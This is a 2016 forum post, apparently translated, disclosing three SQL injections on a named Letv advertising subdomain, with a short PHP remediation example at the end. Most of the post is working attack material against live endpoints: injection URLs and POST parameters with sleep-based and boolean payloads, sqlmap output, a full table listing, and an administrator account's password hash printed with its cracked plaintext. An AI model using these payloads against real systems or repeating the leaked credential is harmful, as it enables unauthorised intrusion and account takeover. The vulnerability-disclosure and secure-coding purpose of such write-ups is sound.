HanDs
Administrator

[July vulnerability disclosure] Three SQL injections on a Letv (乐视网) site






One SQL injection on a Letv site

Details:

http://ad.hz.letv.com/CJO/php/Save_ad_wph_cmt.php?remark=wph&name=1&text=%3Cinput+%2F%3E&pic=0&callback=jQuery17105813498379171187_1464161411962&_=1464161422761



Almost every parameter is injectable:

http://ad.hz.letv.com/CJO/php/Save_ad_wph_cmt.php?remark=wph' or left(user(),16)='[email protected]' and sleep(3) and '1'='1&name=1&text=%3Cinput+%2F%3E&pic=0&callback=jQuery17105813498379171187_1464161411962&_=1464161422761



The request is delayed, so the database user name is:



[email protected]

http://ad.hz.letv.com/CJO/php/Save_ad_wph_cmt.php?remark=wph' or left(database(),2)='ad' and sleep(3) and '1'='1&name=1&text=%3Cinput+%2F%3E&pic=0&callback=jQuery17105813498379171187_1464161411962&_=1464161422761



The database is ad.

Proof of vulnerability:

POST request:

http://ad.hz.letv.com/benzc-class/php/jieda_list.php

Parameters:

province=1

http://ad.hz.letv.com/benzc-class/php/jieda_list.php

province=1' or '1'='2

returns nothing

province=1' or '1'='1

returns all data





Another one:

POST:

http://ad.hz.letv.com/benzc-class/php/jieda_data.php

Parameters:

jjsonpcallback=jQuery220023386403540783274_1464161522072?province=%E5%8C%97%E4%BA%AC&city=%E5%8C%97%E4%BA%AC&name=%E6%B5%8B%E8%AF%95&daqu=%E6%97%A0&mobile=13800138000' or 1=1 and sleep(4) and '1'='1&sex=0&email=%E6%97%A0&interested=%E6%97%A0&memo2=http%3A%2F%2Fad.hz.letv.com%2Ftest%2Fbenzc%2Findex.html&buyCarTime=%E6%97%A0&jxsdm=%E6%97%A0&memo1=benzc&jxsname=%E5%8C%97%E4%BA%AC%E6%B3%A2%E5%A3%AB%E9%80%9A%E8%BE%BE%E6%B1%BD%E8%BD%A6%E9%94%80%E5%94%AE%E6%9C%8D%E5%8A%A1%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8



The mobile parameter is injectable: with or 1=1 the request is delayed, with or 1=2 it is not.

available databases [2]:
[*] ad
[*] information_schema

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: province=1' AND (SELECT * FROM (SELECT(SLEEP(5)))xQWX) AND 'AKoZ'='AKoZ

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: province=1' UNION ALL SELECT CONCAT(0x717a707871,0x4364574254444b78464a6c7a687a744b53664370565654464e78797272684f4b4b7149516b615766,0x7176706271)-- -
---
web application technology: PHP 5.3.19
back-end DBMS: MySQL >= 5.0.0

Database: ad

[91 tables]
+-----------------------------+
| BAM_data |
| CAMRY_data |
| CAMRY_list |
| UserName_data |
| 'Dealer List$'_xlnm#Extract |
| Dealer List |
| a30_people |
| ad_car |
| ad_madinglin_shareNum |
| ad_page_pv_num |
| ad_record |
| ad_voteinfo |
| ad_voterecord |
| ad_wph_cmt |
| ad_wph_online_time |
| ad_wph_tel |
| add_jieqidata |
| audi_2015_list |
| audi_list |
| audi_list_bak |
| audi_list_bak1 |
| audi_list_bak2 |
| audi_list_bak3 |
| baolai_data |
| baolai_list |
| baoshan_user_data |
| baoshan_vip_card |
| baoshan_vip_week |
| benzc_data |
| benzc_list |
| changan_data |
| changan_list |
| createTab |
| diluerweimaData |
| fiesta_car |
| fiesta_list |
| fute_car |
| fute_ld |
| fute_list |
| game_kp_bianhao |
| game_kp_jpk |
| game_kp_user |
| game_yao_info |
| game_yao_jianhao |
| golf_contact |
| golf_data |
| golf_jialv_data |
| golf_jialv_list |
| golf_list |
| golf_people |
| hailan_data |
| hailan_list |
| highlander_data |
| highlander_list |
| hn_list |
| hn_record |
| infiniti_info |
| infiniti_user |
| jieda_data |
| jieda_data_bak_20150504 |
| jieda_list |
| jieda_list_yuan |
| jieda_list_yuan2 |
| jys50_yuyue |
| kadjar_data |
| kadjar_list |
| lingmu_data |
| lingmu_list |
| linmu_list_city |
| meten_phone |
| olay_record |
| olay_vote |
| op_admin_user |
| op_books |
| op_lottery_sys |
| op_signup |
| op_winner_list |
| sj_prize |
| sj_userlist |
| tp_tab |
| tp_tab_ip |
| tz18_jianId |
| tz18_user |
| vezel_contact |
| vezel_people |
| wph_yaoqinma |
| wutaigroup_cont |
| y_prize |
| y_users |
| yifu_list |
| yili |
+-----------------------------+



Table: op_admin_user
[1 entry]
+-----+----------+----------+--------------------------------------------+---------------+
| uid | username | realname | password | lastlogintime |
+-----+----------+----------+--------------------------------------------+---------------+
| 1 | admin | oppo | 408c06609ccabfc09e76f1807156d01c (abc_123) | 1458288536 |
+-----+----------+----------+--------------------------------------------+---------------+



Weak admin password, deserves a spanking.

Fix:

Filter input.
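"Filter" is the whole fix given above; as an added example that is not the site's code, here is the concatenation pattern that produces the behaviour shown for jieda_list.php beside a parameterised version. The table and column names (jieda_list, province), the allowlist rule and the connection details are assumptions.

```php
<?php
// Added example, not the site's code. Assumes a MySQL table jieda_list with a
// column province; host, user and password are placeholders.
$pdo = new PDO('mysql:host=127.0.0.1;dbname=ad;charset=utf8', 'DB_USER', 'DB_PASS');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// Real server-side prepares: the driver never interpolates values into SQL text.
$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);

// VULNERABLE: the request value is pasted into the SQL string, so
// province=1' or '1'='1 becomes part of the WHERE clause and returns every
// row, and a sleep() in the value delays the response (the blind checks above).
function jiedaListVulnerable(PDO $pdo, $province) {
    $sql = "SELECT * FROM jieda_list WHERE province = '" . $province . "'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// FIXED: a prepared statement sends the SQL and the value separately, so the
// value is only ever compared against the column, whatever quotes or keywords
// it contains.
function jiedaListSafe(PDO $pdo, $province) {
    $stmt = $pdo->prepare('SELECT * FROM jieda_list WHERE province = ?');
    $stmt->execute(array($province));
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Additional allowlist (assumed rule): province values on this site are short
// names or numeric ids, so reject anything else before it reaches the database.
function isPlausibleProvince($value) {
    return is_string($value)
        && mb_strlen($value, 'UTF-8') <= 20
        && preg_match('/^[\p{Han}A-Za-z0-9 ]+$/u', $value) === 1;
}

$province = isset($_POST['province']) ? $_POST['province'] : '';
if (!isPlausibleProvince($province)) {
    header('HTTP/1.1 400 Bad Request');
    exit;
}
header('Content-Type: application/json; charset=utf-8');
echo json_encode(jiedaListSafe($pdo, $province));
```

The same change applies to the other two endpoints: every request parameter that reaches a query (remark, name, mobile, ...) goes through a bound parameter, not string concatenation.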


Posted: 2016-7-11   |   Views: 0   |   Replies: 0